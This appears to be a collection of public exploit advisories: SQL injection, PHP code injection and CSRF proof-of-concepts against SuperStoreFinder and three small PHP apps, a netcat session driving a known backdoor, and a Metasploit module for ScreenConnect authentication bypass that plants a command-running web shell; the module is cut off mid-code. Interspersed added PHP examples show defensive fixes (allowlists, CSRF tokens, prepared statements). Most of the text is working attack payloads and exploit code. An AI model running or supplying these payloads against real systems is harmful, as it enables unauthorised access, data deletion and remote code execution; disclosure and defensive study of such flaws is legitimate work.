<pre><code>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br /> .:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities<br /><br />.:. Google Dorks .:.<br />"designed and built by Joe Iz."<br />"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."<br />inurl:/superstorefinder/index.php<br /><br />.:. Date: October 13, 2023<br />.:. Exploit Author: bRpsd<br />.:. Contact: cy[at]live.no<br />.:. Vendor -> https://www.superstorefinder.net/<br />.:. Product -> https://codecanyon.net/item/super-store-finder/3630922<br />.:. Product Version -> [3.7 and below]<br />.:. DBMS -> MySQL<br />.:. Tested on > macOS [*nix Darwin Kernel], on local xampp<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br /><br /><br /> #############<br /> |DESCRIPTION|<br /> #############<br />"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. 
Your customers will never be lost again getting to your stores / locations"<br /><br /><br /><br /><br /><br /><br />===========================================================================================<br />Vulnerability 1: Unauthenticated SQL Injection<br />Types: boolean-based blind, error-based, time-based blind<br />File: localhost/admin/index.php<br />Vul Parameter: USERNAME [POST]<br /><br /><br /><br />Test #1<br /><br />http://localhost:9000/adminstorefinder/admin/index.php<br /><br />username=a'&password=1&btn_login=Login<br /><br />Response Error:<br />Array<br />(<br /> [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1<br />)<br />SELECT users.* FROM users WHERE users.username='admin''<br />===========================================================================================<br /><br />Test #2 => Payload (Proof Of Concept)<br /><br />http://localhost:9000/adminstorefinder/admin/index.php<br /><br />username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj<br />&password=1&btn_login=Login<br /><br /><br />Response Error:<br />Array<br />(<br /> [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist<br />)<br />===========================================================================================<br /><br /><br /><br />======================================================================================================================================================================================<br />Vulnerability 2: Authenticated PHP Injection - Remote Code Execution<br />File: 
localhost/admin/settings.php<br />Vul Parameter: language_set [POST]<br /><br /><br />Proof of concept:<br />http://localhost:9000/superstorefinder/admin/settings.php<br />langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1<br /><br /><br />config.inc.php is included by index.php, so we can just go for RCE<br />with the GET parameter ?cmd=<br /><br /><br />http://localhost:9000/?cmd=uname -a<br /><br />Response:<br />22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64<br />===========================================================================================<br /><br /><br /><br /><br />===========================================================================================<br />Vulnerability 3: Cross Site Request Forgery<br />Risk: It can lead to Privilege Escalation through adding admins or changing admin password.<br />Affected Files (1): localhost/superstorefinder/admin/users_add.php<br />Parameters: username,password,cpassword<br /><br />Proof of concept:<br /><iframe style="display:none" name="CSRF"></iframe><br /> <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF"><br /> <input name="submit_hidden" value="submit_hidden" type="hidden" /><br /> <input type='hidden' name='username' value='X'><br />       <input type='hidden' name='password' value='123'><br /> <input type='hidden' name='cpassword' value='123'><br /> <input type='hidden' value='submit'><br /> </form><br /> <script>document.getElementById("CSRF").submit()</script><br />      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe><br /><br /><br /><br /><br />Affected Files (2): localhost/superstorefinder/admin/change_password.php<br />Parameters: password,cpassword,save<br /><br />Proof of concept:<br /><iframe style="display:none" name="CSRF"></iframe><br /> <form method='POST' action='http://localhost:9000/superstorefinder/admin/change_password.php' target="CSRF" id="CSRF"><br /> <input type='hidden' name='password' value='123'><br />       <input type='hidden' name='cpassword' value='123'><br /> <input type='hidden' name='save' value='save'><br /> </form><br /> <script>document.getElementById("CSRF").submit()</script><br />      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe><br /> ======================================================================================<br /> <br /><br /></code></pre>
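The settings.php payload above closes a quoted string and a parenthesis before its own code, which indicates that the posted language_set value is spliced into PHP source when config.inc.php is regenerated. As an added example, not SuperStoreFinder's own code, the following shows how an admin settings handler can regenerate such a file without ever treating a request value as code, and how the admin POST handlers can reject the cross-origin forms shown for users_add.php and change_password.php; the config path, the allowlists, the zoom range and the `csrf` field name are assumptions.

```php
<?php
// Added example (not SuperStoreFinder code). Assumed: settings live in
// config.inc.php as a returned array, the allowlists below, a 'csrf' POST field.
declare(strict_types=1);

const CONFIG_FILE    = __DIR__ . '/config.inc.php';          // assumed path
const LANGUAGES      = ['en_US', 'de_DE', 'fr_FR', 'es_ES']; // assumed allowlist
const DISTANCE_UNITS = ['mi', 'km'];

// Validate every posted setting against its allowed shape. A value that is not
// on the allowlist (such as "en_US');...//") is refused outright, so it can
// never reach the config file in any form.
function validateSettings(array $post): array
{
    $lang = (string) ($post['language_set'] ?? '');
    if (!in_array($lang, LANGUAGES, true)) {
        throw new InvalidArgumentException('language_set is not an allowed locale');
    }
    $unit = (string) ($post['distance_set'] ?? '');
    if (!in_array($unit, DISTANCE_UNITS, true)) {
        throw new InvalidArgumentException('distance_set must be mi or km');
    }
    $zoom = filter_var($post['init_zoom'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 21]]);
    if ($zoom === false) {
        throw new InvalidArgumentException('init_zoom must be an integer 0..21');
    }
    // Free-text fields get a length cap; they are stored as data, never as code.
    $location = mb_substr(trim((string) ($post['default_location'] ?? '')), 0, 128);

    return [
        'language_set'     => $lang,
        'distance_set'     => $unit,
        'init_zoom'        => $zoom,
        'default_location' => $location,
    ];
}

// Regenerate config.inc.php from validated data only. var_export() emits a PHP
// literal with every quote and backslash escaped, so even a value that slipped
// past validation would stay a string rather than become executable code. The
// file is written under a temporary name and renamed into place so a concurrent
// request never includes a half-written file.
function writeConfig(array $settings, string $path): void
{
    $src = "<?php\n// generated by settings.php; do not edit by hand\nreturn "
         . var_export($settings, true) . ";\n";
    $tmp = $path . '.' . bin2hex(random_bytes(4)) . '.tmp';
    if (file_put_contents($tmp, $src, LOCK_EX) === false || !rename($tmp, $path)) {
        @unlink($tmp);
        throw new RuntimeException('could not write ' . $path);
    }
}
// Consumers load it with: $cfg = require CONFIG_FILE;  (no define() built from strings)

// Anti-CSRF token for the admin POST handlers. The token lives in the session
// and must be echoed back by the form; the hidden cross-origin <form> from the
// PoC cannot read it, so its POST is rejected before any account is touched.
function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function requireCsrfToken(array $post): void
{
    $sent = (string) ($post['csrf'] ?? '');
    if ($sent === '' || !hash_equals(csrfToken(), $sent)) {
        http_response_code(403);
        exit('invalid or missing CSRF token');
    }
}

// Handler sketch for settings.php (the existing admin login check is assumed):
//   session_start();
//   if (isset($_POST['save'])) {
//       requireCsrfToken($_POST);
//       writeConfig(validateSettings($_POST), CONFIG_FILE);
//   }
//   In the form: <input type="hidden" name="csrf" value="<?= htmlspecialchars(csrfToken()) ?>">
```

The same `requireCsrfToken()` call belongs at the top of users_add.php and change_password.php, which is what makes the two auto-submitting forms in the PoC fail.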
<pre><code># Exploit Title: Simple Inventory Management System - SQL Injection<br /># Google Dork: N/A<br /># Application: Simple Inventory Management System<br /># Date: 26.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.<br /><br /><br />## Proof of Concept (PoC):<br /><br />An attacker could, for example, input the following values:<br /><br />email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'<br />pwd: test<br /><br />This would result in the following SQL query:<br /><br />SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'<br /><br />This attack would retrieve all users, making the login process always successful.<br /><br />request-response photo: https://i.imgur.com/slkzYJt.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />ims/login.php<br /><br /><?php <br />ob_start();<br />session_start();<br />include('inc/header.php');<br />$loginError = '';<br />if (!empty($_POST['email']) && !empty($_POST['pwd'])) {<br /> include 'Inventory.php';<br /> $inventory = new Inventory();<br /><br /> // Vulnerable code<br /> $login = $inventory->login($_POST['email'], $_POST['pwd']); <br /> //<br /><br />if(!empty($login)) {<br /> $_SESSION['userid'] = 
$login[0]['userid'];<br /> $_SESSION['name'] = $login[0]['name']; <br /> header("Location:index.php");<br /> } else {<br /> $loginError = "Invalid email or password!";<br /> }<br />}<br />?><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Flashcard Quiz App - SQL Injection<br /># Google Dork: N/A<br /># Application: Flashcard Quiz App<br /># Date: 25.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.<br /><br /><br />## Proof of Concept (PoC):<br /><br />This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.<br /><br />1. Original Code:<br /><br />$card = $_GET['card'];<br /><br />$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";<br /><br />2. Payload:<br /><br />' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --<br /><br />3. Injected Query:<br /><br />DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --<br /><br />Request-response photo: https://i.imgur.com/5IXvpiZ.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />endpoint/delete-flashcard.php<br /><br />$card = $_GET['card'];<br /><br />$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";<br /><br /></code></pre>
<pre><code># Exploit Title: FAQ Management System - SQL Injection<br /># Google Dork: N/A<br /># Application: FAQ Management System<br /># Date: 25.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.<br /><br /><br />## Proof of Concept (PoC):<br /><br />An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:<br /><br />1. Original Request:<br />http://example.com/endpoint/delete-faq.php?faq=123<br /><br />2. Malicious Request (SQL Injection):<br />http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --<br /><br />This would result in a query like:<br /><br />DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --<br /><br />Which can lead to the deletion of data or even the entire table.<br /><br /><br />PoC photo: https://i.imgur.com/1IENYFg.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />endpoint/delete-faq.php<br /><br /><br />$faq = $_GET['faq'];<br /><br />// ...<br /><br />$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";<br /></code></pre>
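The same defect, a request value spliced into a SQL string, underlies the login query in the Simple Inventory Management System advisory, the two DELETE endpoints in the Flashcard Quiz App and FAQ Management System advisories, and the admin login of SuperStoreFinder at the top of the page. As an added example, not code from any of those projects, here is a PDO-based replacement for all three query shapes; table and column names come from the advisories, while the DSN, the credentials and the assumption that passwords are stored as password_hash() hashes (the originals compare them inside the WHERE clause) are mine.

```php
<?php
// Added example (not code from the Simple Inventory Management System, Flashcard
// Quiz App, FAQ Management System or SuperStoreFinder). Table and column names
// come from the advisories; the DSN, credentials and hashed-password storage
// are assumptions.
declare(strict_types=1);

function db(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=ims;charset=utf8mb4', 'ims', 'secret', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Server-side prepares: the query text is sent once and the parameters
        // separately, so no request value is ever parsed as SQL by MySQL.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Replacement for Inventory::login() in ims/login.php. The email is bound as a
// parameter, so "test@gmail.com'+(select*from(select(sleep(20)))a)+'" is
// compared literally against the column and matches nothing. The password is
// never part of the query: it is checked against the stored hash.
function login(PDO $pdo, string $email, string $password): ?array
{
    $stmt = $pdo->prepare('SELECT userid, name, password FROM users WHERE email = ? LIMIT 1');
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null; // identical outcome for unknown email and wrong password
    }
    return ['userid' => (int) $row['userid'], 'name' => $row['name']];
}

// Replacement for endpoint/delete-flashcard.php and endpoint/delete-faq.php.
// The table is chosen from a fixed map (identifiers cannot be bound), the id is
// validated as a positive integer before any query is built, and it is bound as
// an integer, so "' OR '1'='1" or "'; DROP TABLE ..." is rejected at validation
// and could not become SQL even if it got through.
function deleteById(PDO $pdo, string $table, string $rawId): int
{
    $idColumns = ['tbl_card' => 'tbl_card_id', 'tbl_faq' => 'tbl_faq_id'];
    if (!isset($idColumns[$table])) {
        throw new InvalidArgumentException('unknown table');
    }
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 0; // not a valid id: nothing is deleted and nothing reaches MySQL
    }
    $stmt = $pdo->prepare("DELETE FROM {$table} WHERE {$idColumns[$table]} = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Endpoint usage (the originals' session handling is left as it was):
//   $user    = login(db(), (string) ($_POST['email'] ?? ''), (string) ($_POST['pwd'] ?? ''));
//   $deleted = deleteById(db(), 'tbl_faq', (string) ($_GET['faq'] ?? ''));
```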
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.AutoSpy.10<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands available are "info tick", which returns system information, "kill" [file], etc.<br />Family: AutoSpy<br />Type: PE32<br />MD5: b012704cad2bae6edbd23135394b9127<br />Vuln ID: MVID-2024-0671<br />Disclosure: 02/24/2024<br /><br />Exploit/PoC:<br />C:\sec>nc64.exe x.x.x.x 1008<br />startapp "c:\Windows\System32\mspaint.exe"<br />Application started...<br />startapp "c:\Windows\System32\calc.exe"<br />Application started...<br />msgbox hate<br />Messagebox shown...<br />info tick<br />Product Name :<br />Product ID :<br />Product Type :<br />User Organization :<br />User Name :<br />System Root :<br />Version :<br />Version Number :<br />Sub Version Number :<br />Computer Name : DESKTOP-2C4IJHO<br />Time Zone : @tzres.dll,-112<br />Network Logon :<br />beep Beep<br />Beep send...<br />hangup victim<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create<br /> a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage<br /> this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7<br /> and below are affected.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF RCE Exploit<br /> 'WatchTowr', # Auth Bypass PoC<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-1708'], # Path traversal when extracting zip file.<br /> ['CVE', '2024-1709'], # Auth bypass to create admin account.<br /> ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory<br /> ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC<br /> ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs<br /> ],<br /> 'DisclosureDate' => '2024-02-19',<br /> 'Platform' => %w[win linux unix],<br /> 'Arch' => [ARCH_X64, ARCH_CMD],<br /> 'Privileged' => true, # 'NT AUTHORITY\SYSTEM' on Windows, root on Linux.<br /> 'Targets' => [<br /> [<br /> # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:<br /> # 
windows/x64/meterpreter/reverse_tcp<br /> 'Windows In-Memory', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_X64<br /> }<br /> ],<br /> [<br /> # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:<br /> # cmd/windows/http/x64/meterpreter/reverse_tcp<br /> 'Windows Command', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'FETCH_WRITABLE_DIR' => '%TEMP%'<br /> }<br /> }<br /> ],<br /> [<br /> # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads:<br /> # cmd/linux/http/x64/meterpreter/reverse_tcp<br /> # cmd/unix/reverse_bash<br /> 'Linux Command', {<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8040,<br /> 'SSL' => false,<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> CONFIG_CHANGES,<br /> # The existing administrator account will be replaced<br /> ACCOUNT_LOCKOUTS<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alpha_lower(8)]),<br /> OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(16)])<br /> ])<br /> end<br /><br /> def check<br /> # This is a file found on the recent 23.9.7.8804 (Circa 2024), an out of support 20.3.31734 (Circa 2021), and<br /> # a very old 2.5.3409.4645 (Circa 2012). So we can expect this file to exist on all targets. As this endpoint<br /> # expects authentication, the response will be a 302 redirect to the Login page. 
As Windows is case insensitive<br /> # we can request 'Host.aspx' with any case and get the expected 302 response, however Linux is case sensitive and<br /> # will always 404 a request to 'Host.aspx' if we jumble up the case. Both a 302 and 404 response will still include<br /> # the Server header, which we use to confirm both ScreenConnect and the version number.<br /> host_aspx = 'Host.aspx'<br /><br /> host_aspx = loop do<br /> jumblecase_host_aspx = host_aspx.chars.map { |c| rand(2) == 0 ? c.upcase : c.downcase }.join<br /> break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, host_aspx)<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404<br /><br /> platform = res.code == 302 ? 'Windows' : 'Linux'<br /><br /> if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})<br /><br /> detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."<br /><br /> if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')<br /> return CheckCode::Appears(detected)<br /> end<br /><br /> return CheckCode::Safe(detected)<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> # Sanity check the USERNAME and PASSWORD will meet the server's password requirements.<br /> fail_with(Failure::BadConfig, 'USERNAME must not be empty.') if datastore['USERNAME'].empty?<br /> fail_with(Failure::BadConfig, 'PASSWORD must be 8 characters or more.') if datastore['PASSWORD'].length < 8<br /><br /> #<br /> # 1. 
Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')<br /> end<br /><br /> viewstate, viewstategen = get_viewstate(res)<br /> unless viewstate && viewstategen<br /> fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')<br /> end<br /><br /> #<br /> # 2. Advance to the next step in the setup.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),<br /> 'vars_post' => {<br /> '__EVENTTARGET' => '',<br /> '__EVENTARGUMENT' => '',<br /> '__VIEWSTATE' => viewstate,<br /> '__VIEWSTATEGENERATOR' => viewstategen,<br /> 'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')<br /> end<br /><br /> viewstate, viewstategen = get_viewstate(res)<br /> unless viewstate && viewstategen<br /> fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')<br /> end<br /><br /> #<br /> # 3. 
Create a new administrator account.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),<br /> 'vars_post' => {<br /> '__EVENTTARGET' => '',<br /> '__EVENTARGUMENT' => '',<br /> '__VIEWSTATE' => viewstate,<br /> '__VIEWSTATEGENERATOR' => viewstategen,<br /> 'ctl00$Main$wizard$userNameBox' => datastore['USERNAME'],<br /> 'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: datastore['USERNAME']).to_s,<br /> 'ctl00$Main$wizard$passwordBox' => datastore['PASSWORD'],<br /> 'ctl00$Main$wizard$verifyPasswordBox' => datastore['PASSWORD'],<br /> 'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')<br /> end<br /><br /> print_status("Created account: #{datastore['USERNAME']}:#{datastore['PASSWORD']} (Note: This account will not be deleted by the module)")<br /><br /> #<br /> # 4. Log in with this account to get an authenticated HTTP session.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'Administration'),<br /> 'keep_cookies' => true,<br /> 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')<br /> end<br /><br /> if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}<br /> anti_forgery_token = Regexp.last_match(1)<br /> else<br /> # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).<br /> print_warning('Could not locate anti forgery token after login with admin credentials.')<br /> anti_forgery_token = ''<br /> end<br /><br /> #<br /> # 5. 
Create an extension to host the payload.<br /> #<br /><br /> # NOTE: Rex::Text.rand_guid returns a GUID string wrapped in curly braces which is not what we want, so we use<br /> # Faker::Internet.uuid instead.<br /> plugin_guid = Faker::Internet.uuid<br /><br /> payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"<br /><br /> # According to Microsoft (https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/) these are<br /> # the list of valid C# keywords, we create a Rex::RandomIdentifier::Generator to generate new identifiers for<br /> # use in the ASHX payload, and pass the list of valid C# keywords as a forbidden list so we don't accidentally<br /> # generate a valid keyword.<br /> vars = Rex::RandomIdentifier::Generator.new({<br /> forbidden: %w[<br /> abstract add alias and args as ascending async await<br /> base bool break by byte case catch char checked class const continue decimal default delegate descending do<br /> double dynamic else enum equals event explicit extern false file finally fixed float for foreach from get<br /> global goto group if implicit in init int interface internal into is join let lock long managed nameof<br /> namespace new nint not notnull nuint null object on operator or orderby out override params partial private<br /> protected public readonly record ref remove required return sbyte scoped sealed select set short sizeof<br /> stackalloc static string struct switch this throw true try typeof uint ulong unchecked unmanaged unsafe ushort<br /> using value var virtual void volatile when where while with yield<br /> ]<br /> })<br /><br /> if target['Arch'] == ARCH_CMD<br /> payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %><br />using System;<br />using System.Web;<br />using System.Diagnostics;<br /><br />public class #{vars[:var_handler_class]} : IHttpHandler<br />{<br /> public void ProcessRequest(HttpContext #{vars[:var_ctx]})<br /> {<br /> if 
(String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {<br /> return;<br /> }<br /><br /> byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);<br /><br /> string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});<br /><br /> ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();<br /><br /> #{vars[:var_psi]}.FileName = "#{target['Platform'] == 'win' ? 'cmd.exe' : '/bin/sh'}";<br /><br /> #{vars[:var_psi]}.Arguments = "#{target['Platform'] == 'win' ? '/c' : '-c'} \\\"" + #{vars[:var_payload]} + "\\\"";<br /><br /> #{vars[:var_psi]}.RedirectStandardOutput = true;<br /><br /> #{vars[:var_psi]}.UseShellExecute = false;<br /><br /> Process.Start(#{vars[:var_psi]});<br /> }<br /><br /> public bool IsReusable { get { return true; } }<br />})<br /> else<br /> payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %><br />using System;<br />using System.Web;<br />using System.Diagnostics;<br />using System.Runtime.InteropServices;<br /><br />public class #{vars[:var_handler_class]} : IHttpHandler<br />{<br /> [System.Runtime.InteropServices.DllImport("kernel32")]<br /> private static 